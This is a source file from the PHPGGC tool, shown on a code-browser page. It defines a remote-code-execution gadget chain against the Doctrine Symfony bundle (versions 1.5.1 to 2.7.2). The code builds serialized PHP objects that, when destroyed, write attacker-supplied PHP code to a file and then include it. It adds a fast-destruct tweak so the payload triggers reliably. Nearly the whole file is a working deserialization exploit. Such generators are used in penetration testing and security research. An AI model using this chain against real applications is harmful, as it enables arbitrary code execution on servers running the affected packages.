Codebase list phpggc / 19dc4c61-630c-43cf-8158-450497890ca9/upstream/0.20221219 gadgetchains / Doctrine / RCE / 1 / chain.php
19dc4c61-630c-43cf-8158-450497890ca9/upstream/0.20221219

Tree @19dc4c61-630c-43cf-8158-450497890ca9/upstream/0.20221219 (Download .tar.gz)

chain.php @19dc4c61-630c-43cf-8158-450497890ca9/upstream/0.20221219raw · history · blame 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
<?php

namespace GadgetChain\Doctrine;

use Doctrine\Common\Cache\Psr6\CacheAdapter;
use Doctrine\Common\Cache\Psr6\TypedCacheItem;
use Doctrine\Common\Cache\Psr6\CacheItem;
use Symfony\Component\Cache\Adapter\PhpArrayAdapter;
use Symfony\Component\Cache\Adapter\ProxyAdapter;
use Symfony\Component\HttpFoundation\Session\Storage\MockFileSessionStorage;
use Symfony\Component\HttpFoundation\Session\Storage\MetadataBag;


class RCE1 extends \PHPGGC\GadgetChain\RCE\PHPCode
{
    public static $version = '1.5.1 <= 2.7.2';
    public static $vector = '__destruct';
    public static $author = 'Remsio';
    public static $information = 
        'Based on package doctrine/doctrine-bundle, the Symfony bundle for doctrine.
        The chain is based on one chain to write, and on another one to include.
        Be careful, the POP chain differs depending on the PHP version';

    /**
     * Fast destruct implementation for both chains, mandatory to make sure the payload triggers correctly
     */
    public function process_serialized($serialized)
    {

        $find_write = (
            '#i:(' .
                1001 . '|' .
                (1001 + 1) .
            ');#'
        );
        $replace_write = 'i:' . 1000 . ';';
        $serialized2 = preg_replace($find_write, $replace_write, $serialized);
        $find_include = (
            '#i:(' .
                2001 . '|' .
                (2001 + 1) .
            ');#'
        );
        $replace_include = 'i:' . 2000 . ';';
        return preg_replace($find_include, $replace_include, $serialized2);
  	}

    public function generate(array $parameters)
    {
        $code = $parameters['code'];
        /* CacheItem is compatible with PHP 7.*, TypedCacheItem is compatible with PHP 8.* */
        if (preg_match('/^7/', phpversion()))
        {
            $firstCacheItem = new CacheItem();
            $secondCacheItem = new CacheItem();
        } 
        else 
        {
            $firstCacheItem = new TypedCacheItem();
            $secondCacheItem = new TypedCacheItem();
        }
        echo phpversion();

        /* File write */
        $obj_write = new CacheAdapter();
        $mockFileSessionStorage = new MockFileSessionStorage();
        $mockFileSessionStorage->data = ['<?php '. $code. ' ?>']; // Content put in the file
        $mockFileSessionStorage->metadataBag = new MetadataBag();
        $obj_write->cache = $mockFileSessionStorage;
        $obj_write->deferredItems = [$firstCacheItem];
        
        /* File inclusion */
        $obj_include = new CacheAdapter();
        $proxyAdapter = new ProxyAdapter();
        $proxyAdapter->pool = new PhpArrayAdapter();
        $obj_include->cache = $proxyAdapter;
        $cacheItem = $secondCacheItem;
        $cacheItem->expiry = 0; // mandatory to go to another branch from CacheAdapter __destruct
        $obj_include->deferredItems = [$cacheItem];
        $obj = [1000 => $obj_write, 1001 => 1, 2000 => $obj_include, 2001 => 1];
        return $obj;
    }
}